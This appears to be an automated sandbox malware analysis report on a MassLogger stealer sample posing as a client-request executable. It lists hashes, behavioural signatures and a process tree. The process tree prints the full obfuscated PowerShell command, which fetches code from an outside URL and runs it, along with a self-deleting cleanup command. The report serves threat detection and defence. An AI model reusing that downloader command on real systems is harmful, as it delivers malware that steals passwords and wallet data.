Analysis
- max time kernel: 152s
- max time network: 132s
- platform: windows7_x64
- resource: win7v200722
- submitted: 31-07-2020 10:56
- Static task: static1
- Behavioral task: behavioral1
  Sample: Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
  Resource: win7v200722
- Behavioral task: behavioral2
  Sample: Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
  Resource: win10
General
- Target: Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
- Size: 19KB
- MD5: 36117a183609bb6953d3f78bb45ee5b9
- SHA1: 0d89d56bac5838a3f0854e43b42e564d290f4935
- SHA256: 3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1
- SHA512: 79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2
Malware Config
Extracted
- Path: C:\Users\Admin\AppData\Local\42EF15E83D\Log.txt
- Family: masslogger
Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description, pid, pid_target, process, target process):
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process, 752, 992, Powershell.exe
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes (description, pid, process):
- Powershell.exe (pid 752), 21 entries in order: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- Powershell.exe (pid 752), 20 entries in order: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- InstallUtil.exe (pid 1220): Token: SeDebugPrivilege
- powershell.exe (pid 1204): Token: SeDebugPrivilege
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes (pid, process):
- 752, Powershell.exe
- 752, Powershell.exe
- 1220, InstallUtil.exe
- 1204, powershell.exe
- 1204, powershell.exe
Blacklisted process makes network request 1 IoCs
Processes (flow, pid, process):
- 5, 752, Powershell.exe
Suspicious use of WriteProcessMemory 20 IoCs
Processes (description, pid, process, target process):
- PID 752 wrote to memory of 1220, 752, Powershell.exe, InstallUtil.exe (12 entries)
- PID 1220 wrote to memory of 1976, 1220, InstallUtil.exe, cmd.exe (4 entries)
- PID 1976 wrote to memory of 1204, 1976, cmd.exe, powershell.exe (4 entries)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Suspicious use of SetThreadContext 1 IoCs
Processes (description, pid, process, target process):
- PID 752 set thread context of 1220, 752, Powershell.exe, InstallUtil.exe
MassLogger log file 1 IoCs
Detects a log file produced by MassLogger.
Processes (yara_rule):
- masslogger_log_file
Drops file in System32 directory 2 IoCs
Processes (description, ioc, process):
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, Powershell.exe
- File opened for modification, C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
- 9, api.ipify.org
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
Processes
- (depth 1) C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
- (depth 1) C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
  Signatures: Process spawned unexpected child process; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Blacklisted process makes network request; Suspicious use of WriteProcessMemory; Suspicious use of SetThreadContext; Drops file in System32 directory
  - (depth 2) C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - (depth 3) C:\Windows\SysWOW64\cmd.exe
      Command line: "cmd" /c start /b powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe' & exit
      Signatures: Suspicious use of WriteProcessMemory
      - (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
        Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Drops file in System32 directory
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
- memory/1204-8-0x0000000000000000-mapping.dmp
- memory/1204-9-0x0000000000000000-mapping.dmp
- memory/1220-3-0x0000000000400000-0x000000000049A000-memory.dmp (Filesize 616KB)
- memory/1220-4-0x000000000049424E-mapping.dmp
- memory/1220-5-0x0000000000400000-0x000000000049A000-memory.dmp (Filesize 616KB)
- memory/1220-6-0x0000000000400000-0x000000000049A000-memory.dmp (Filesize 616KB)
- memory/1976-7-0x0000000000000000-mapping.dmp